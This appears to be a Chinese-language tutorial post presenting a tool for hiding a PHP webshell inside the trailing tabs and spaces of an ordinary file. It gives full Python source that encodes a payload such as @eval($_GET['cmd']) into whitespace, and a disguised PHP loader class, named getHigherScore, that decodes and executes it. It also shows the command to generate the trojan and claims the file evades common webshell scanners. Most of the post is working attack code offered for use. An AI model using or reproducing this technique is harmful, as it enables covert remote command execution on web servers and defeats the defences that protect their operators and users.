如今,各大杀毒软件死死的盯着那几个危险函数不放。但是还有些人喜欢通过检索 webshell 关键字这样批量去找,这就更不可能找到了。那么今天这个 webshell 的原理是什么呢?这个webshell的原理就是:每一行最后都有空格与制表符。\t的数量代表着 ascii 码 16 进制的第一位,空格的数量代表着 ascii 码 16 进制的第二位。然后有个关键的15,其实代表了前 15 行的空白字符组成的是create_function,后面就可以写一句话咯,例如@eval($_GET["pass"]);,每一行写入一个字符即可。执行的时候先读取自身代码之后,按行提取出里面的空格和制表符,提取出隐藏的代码之后执行就完事了。
- import sys
- def put_color(string, color):
- colors = {
- 'red': '31',
- 'green': '32',
- 'yellow': '33',
- 'blue': '34',
- 'pink': '35',
- 'cyan': '36',
- 'gray': '2',
- 'white': '37',
- }
- return '\033[40;1;%s;40m%s\033[0m' % (colors[color], str(string))
- if len(sys.argv) not in [3, 4]:
- sys.exit(
- '''[!] usage: python hidden_webshell.py payload filename [output_filename]\n'''
- ''' [-] example: python {}{}{}'''.format(
- put_color('hidden_webshell.py', 'white'),
- put_color(''' 'system("echo \"hacked by benben :)\"");' ''', 'green'),
- put_color('webshell.php', 'blue')
- )
- )
- webshell_name = sys.argv[2]
- hidden_name = sys.argv[3] if len(sys.argv) == 4 else 'webshell_hidden.php'
- exp = sys.argv[1]
- if not exp.endswith(';'):
- print('[!] WARN: {} {}'.format(
- put_color('The payload should end in', 'yellow'),
- put_color(';', 'cyan')
- ))
- print(' [+] Hide webshell')
- print(' [-] Read from {}'.format(put_color(webshell_name, 'blue')))
- print(' [-] Payload is {}'.format(put_color(exp, 'green')))
- payload = 'create_function' + exp
- with open(webshell_name, 'r') as fp:
- raw_php = fp.readlines()
- for line, content in enumerate(payload):
- hex_num = hex(ord(content))
- tab_num = int(hex_num[2], 16)
- space_num = int(hex_num[3], 16)
- hidden = '\t' * tab_num + ' ' * space_num
- if line < len(raw_php):
- if raw_php[line].endswith('\n'):
- raw_php[line] = raw_php[line][:-1] + hidden + '\n'
- else:
- raw_php[line] = raw_php[line] + hidden
- else:
- raw_php.append(hidden + "\n")
- with open(hidden_name, 'w') as fp:
- fp.writelines(raw_php)
- print('[!] Saved as {}'.format(put_color(hidden_name, 'blue')))
- print('[!] All done\n\nBye :)')
- <?php
- class getHigherScore {
- function __construct() {
- $lines = file(__FILE__);
- $lower = "";
- $higher = "";
- for($i = 0; $i < count($lines); $i++) {
- $value = $this->getArrayValue($lines[$i]);
- if ($i < 15) {
- $lower .= $value;
- } else {
- $higher .= $value;
- }
- }
- $verifyScore = $lower('', "$higher");
- $result = $verifyScore();
- return $result;
- }
- function getArrayValue($result) {
- preg_match('/([\t ]+)\r?\n?$/', $result, $match);
- if (isset($match[1])) {
- $lower = dechex(substr_count($match[1], "\t"));
- $higher = dechex(substr_count($match[1], " "));
- $result = hexdec($lower.$higher);
- $result = chr($result);
- print $result;
- return $result;
- }
- return '';
- }
- }
- $score = new getHigherScore();
- print $score;
python HiddenWebShell.py @eval($_GET['cmd']); demo.php 这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。
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